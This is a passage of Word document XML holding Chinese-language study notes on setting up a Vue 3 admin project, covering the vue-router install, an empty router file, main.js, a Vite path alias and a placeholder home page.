    <w:p w14:paraId="3607BC13" w14:textId="32EF1873" w:rsidR="005F2157" w:rsidRDefault="005F2157" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安装</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="371179B2" w14:textId="31EFEB8F" w:rsidR="007F2C96" w:rsidRDefault="005F2157" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="005F2157">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>npm install vue-router@4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="347677FC" w14:textId="77777777" w:rsidR="007F2C96" w:rsidRDefault="007F2C96" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3FE5BB9D" w14:textId="77777777" w:rsidR="007F2C96" w:rsidRDefault="007F2C96" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A8BB150" w14:textId="01F3F52F" w:rsidR="003F2F38" w:rsidRDefault="003F2F38" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>目前没有要对的路由，但是可以先弄空的</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27D90EAF" w14:textId="77777777" w:rsidR="003F2F38" w:rsidRDefault="003F2F38" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B5B514C" w14:textId="2C6DF0A9" w:rsidR="007F2C96" w:rsidRDefault="00DE2734" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>新建</w:t>
      </w:r>
      <w:r>
        <w:t>src/router/index.js</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D68EC63" w14:textId="77777777" w:rsidR="00DE2734" w:rsidRDefault="00DE2734" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D248E80" w14:textId="77777777" w:rsidR="00DE2734" w:rsidRPr="00DE2734" w:rsidRDefault="00DE2734" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE2734">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>import {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E7BA515" w14:textId="77777777" w:rsidR="00DE2734" w:rsidRPr="00DE2734" w:rsidRDefault="00DE2734" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE2734">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    createRouter,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4878F5A3" w14:textId="77777777" w:rsidR="00DE2734" w:rsidRPr="00DE2734" w:rsidRDefault="00DE2734" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE2734">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    createWebHistory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63745457" w14:textId="77777777" w:rsidR="00DE2734" w:rsidRPr="00DE2734" w:rsidRDefault="00DE2734" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE2734">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>} from 'vue-router'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00D47D8D" w14:textId="77777777" w:rsidR="00DE2734" w:rsidRPr="00DE2734" w:rsidRDefault="00DE2734" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72E14BEF" w14:textId="77777777" w:rsidR="00DE2734" w:rsidRPr="00DE2734" w:rsidRDefault="00DE2734" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE2734">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>const routes = []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="482AF521" w14:textId="77777777" w:rsidR="00DE2734" w:rsidRPr="00DE2734" w:rsidRDefault="00DE2734" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="330AC82F" w14:textId="77777777" w:rsidR="00DE2734" w:rsidRPr="00DE2734" w:rsidRDefault="00DE2734" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE2734">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>const router = createRouter({</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FAE7AB5" w14:textId="77777777" w:rsidR="00DE2734" w:rsidRPr="00DE2734" w:rsidRDefault="00DE2734" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE2734">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    history: createWebHistory(),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23A63E1C" w14:textId="77777777" w:rsidR="00DE2734" w:rsidRPr="00DE2734" w:rsidRDefault="00DE2734" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE2734">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    routes: routes  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BA96F2B" w14:textId="77777777" w:rsidR="00DE2734" w:rsidRPr="00DE2734" w:rsidRDefault="00DE2734" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE2734">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E1AAAE5" w14:textId="77777777" w:rsidR="00DE2734" w:rsidRPr="00DE2734" w:rsidRDefault="00DE2734" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="294AB397" w14:textId="101B1113" w:rsidR="007F2C96" w:rsidRDefault="00DE2734" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00DE2734">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>export default router</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31D87FBF" w14:textId="77777777" w:rsidR="007F2C96" w:rsidRDefault="007F2C96" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59A99EB2" w14:textId="5C354753" w:rsidR="007F2C96" w:rsidRDefault="00BD54DC" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>main</w:t>
      </w:r>
      <w:r>
        <w:t>.js</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B3A0A79" w14:textId="77777777" w:rsidR="007F2C96" w:rsidRPr="00433A7E" w:rsidRDefault="007F2C96" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4433A435" w14:textId="77777777" w:rsidR="00BD54DC" w:rsidRDefault="00BD54DC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import {createApp} from 'vue'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C2F4FA9" w14:textId="77777777" w:rsidR="00BD54DC" w:rsidRDefault="00BD54DC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import ElementPlus from 'element-plus'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E0FC809" w14:textId="77777777" w:rsidR="00BD54DC" w:rsidRDefault="00BD54DC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import 'element-plus/dist/index.css'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E79B93F" w14:textId="77777777" w:rsidR="00BD54DC" w:rsidRDefault="00BD54DC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import App from './App.vue'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EC44D4C" w14:textId="77777777" w:rsidR="00BD54DC" w:rsidRDefault="00BD54DC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD54DC">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>import router from './router'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BD64B46" w14:textId="77777777" w:rsidR="00BD54DC" w:rsidRDefault="00BD54DC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="567F11B7" w14:textId="2D5EDB30" w:rsidR="00BD54DC" w:rsidRDefault="00BD54DC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>const app = createApp(App)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E3BA242" w14:textId="636178A9" w:rsidR="00BD54DC" w:rsidRDefault="00BD54DC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD54DC">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>app.use(router)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="354A8EB1" w14:textId="2A85A040" w:rsidR="00BD54DC" w:rsidRDefault="00BD54DC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>app.use(ElementPlus)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23B503A0" w14:textId="309A4CEB" w:rsidR="00BD54DC" w:rsidRDefault="00BD54DC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import 'virtual:windi.css'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CB0AECE" w14:textId="7258D1B6" w:rsidR="007F2C96" w:rsidRDefault="00BD54DC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>app.mount('#app')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CF70760" w14:textId="39BAE2DB" w:rsidR="00433A7E" w:rsidRDefault="00433A7E" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="686" w:name="_Toc159780116"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>路由配置和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>04</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>页面捕获</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>配置</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>vite</w:t>
      </w:r>
      <w:bookmarkEnd w:id="686"/>
    </w:p>
    <w:p w14:paraId="012EEF6E" w14:textId="77777777" w:rsidR="007F2C96" w:rsidRDefault="007F2C96" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CFA3837" w14:textId="6931C263" w:rsidR="00B37A84" w:rsidRDefault="00B37A84" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>先访问</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>vitejs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>官网，配置别名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CB6CE9D" w14:textId="26635BCF" w:rsidR="007F2C96" w:rsidRDefault="00901688" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00901688">
        <w:t>https://vitejs.cn/config/#resolve-alias</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C213A81" w14:textId="77777777" w:rsidR="007F2C96" w:rsidRPr="004D2ED1" w:rsidRDefault="007F2C96" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21CE53C6" w14:textId="18A4D3A7" w:rsidR="007F2C96" w:rsidRDefault="00BA26D2" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">## </w:t>
      </w:r>
      <w:r w:rsidR="004E74C3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>添加第一个页面：后台首页</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03709A31" w14:textId="2FF13A8C" w:rsidR="007F2C96" w:rsidRDefault="005F2D5C" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>总配置</w:t>
      </w:r>
      <w:r>
        <w:t>--</w:t>
      </w:r>
      <w:r w:rsidR="002C49DB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>v</w:t>
      </w:r>
      <w:r w:rsidR="002C49DB">
        <w:t>ite.config.js</w:t>
      </w:r>
      <w:r w:rsidR="00EE1655">
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00EE1655">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>给</w:t>
      </w:r>
      <w:r w:rsidR="00EE1655">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>src</w:t>
      </w:r>
      <w:r w:rsidR="00EE1655">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>配置别名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28367D2F" w14:textId="77777777" w:rsidR="002C49DB" w:rsidRDefault="002C49DB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="755B7B4A" w14:textId="77777777" w:rsidR="002C49DB" w:rsidRPr="002C49DB" w:rsidRDefault="002C49DB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70DA87F7" w14:textId="77777777" w:rsidR="002C49DB" w:rsidRDefault="002C49DB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import { defineConfig } from 'vite'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A9F0B0A" w14:textId="77777777" w:rsidR="002C49DB" w:rsidRDefault="002C49DB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import vue from '@vitejs/plugin-vue'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12773F4D" w14:textId="77777777" w:rsidR="002C49DB" w:rsidRDefault="002C49DB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import WindiCSS from 'vite-plugin-windicss'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03C41716" w14:textId="77777777" w:rsidR="002C49DB" w:rsidRDefault="002C49DB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14B65D9E" w14:textId="77777777" w:rsidR="002C49DB" w:rsidRDefault="002C49DB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="002C49DB">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>import path from 'path'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="333239D6" w14:textId="77777777" w:rsidR="002C49DB" w:rsidRDefault="002C49DB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28E18C81" w14:textId="77777777" w:rsidR="002C49DB" w:rsidRDefault="002C49DB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>// https://vitejs.dev/config/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FD7E875" w14:textId="77777777" w:rsidR="002C49DB" w:rsidRDefault="002C49DB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>export default defineConfig({</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48FDC82A" w14:textId="77777777" w:rsidR="002C49DB" w:rsidRPr="002C49DB" w:rsidRDefault="002C49DB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="002C49DB">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>resolve: {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AF4D03E" w14:textId="77777777" w:rsidR="002C49DB" w:rsidRPr="002C49DB" w:rsidRDefault="002C49DB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C49DB">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    alias: {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CE5C453" w14:textId="77777777" w:rsidR="002C49DB" w:rsidRPr="002C49DB" w:rsidRDefault="002C49DB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C49DB">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">      "~": path.resolve(__dirname, "./src"),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05A969EA" w14:textId="77777777" w:rsidR="002C49DB" w:rsidRPr="002C49DB" w:rsidRDefault="002C49DB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C49DB">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F50ED9B" w14:textId="77777777" w:rsidR="002C49DB" w:rsidRDefault="002C49DB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="002C49DB">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">  },</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EB8249A" w14:textId="77777777" w:rsidR="002C49DB" w:rsidRDefault="002C49DB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  plugins: [vue(),WindiCSS()],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11D7F350" w14:textId="29612B39" w:rsidR="007F2C96" w:rsidRDefault="002C49DB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="249E0FAB" w14:textId="77777777" w:rsidR="007F2C96" w:rsidRDefault="007F2C96" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5ECBD129" w14:textId="75BF39D2" w:rsidR="007F2C96" w:rsidRDefault="002C49DB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>上述代码引入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>path</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，进行重命名，将</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>sr</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>目录重命名为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>~</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3795B775" w14:textId="77777777" w:rsidR="002C49DB" w:rsidRDefault="002C49DB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C62F5A3" w14:textId="77777777" w:rsidR="002C49DB" w:rsidRDefault="002C49DB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C23FB05" w14:textId="77777777" w:rsidR="007F2C96" w:rsidRDefault="007F2C96" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B61C297" w14:textId="7746E552" w:rsidR="007F2C96" w:rsidRDefault="00947723" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>新建</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>src/pages/index.vue</w:t>
      </w:r>
      <w:r w:rsidR="000A472E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：写新网页</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1072D12F" w14:textId="77777777" w:rsidR="007F2C96" w:rsidRDefault="007F2C96" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21B52AC4" w14:textId="77777777" w:rsidR="00083BE9" w:rsidRPr="00A228ED" w:rsidRDefault="00083BE9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A228ED">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>&lt;template&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E367606" w14:textId="77777777" w:rsidR="00083BE9" w:rsidRPr="00A228ED" w:rsidRDefault="00083BE9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A228ED">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A5A8F55" w14:textId="77777777" w:rsidR="00083BE9" w:rsidRPr="00A228ED" w:rsidRDefault="00083BE9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A228ED">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00A228ED">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>后台首页</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F3990D7" w14:textId="77777777" w:rsidR="00083BE9" w:rsidRPr="00A228ED" w:rsidRDefault="00083BE9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A228ED">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="719E31D2" w14:textId="2E763D3B" w:rsidR="00947723" w:rsidRDefault="00083BE9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00A228ED">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>&lt;/template&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="200340C5" w14:textId="77777777" w:rsidR="00947723" w:rsidRDefault="00947723" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FCF9FA3" w14:textId="56312C3A" w:rsidR="007F2C96" w:rsidRDefault="00A228ED" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r>
        <w:t>outer/index.js</w:t>
      </w:r>
      <w:r w:rsidR="000A472E">
        <w:rPr>
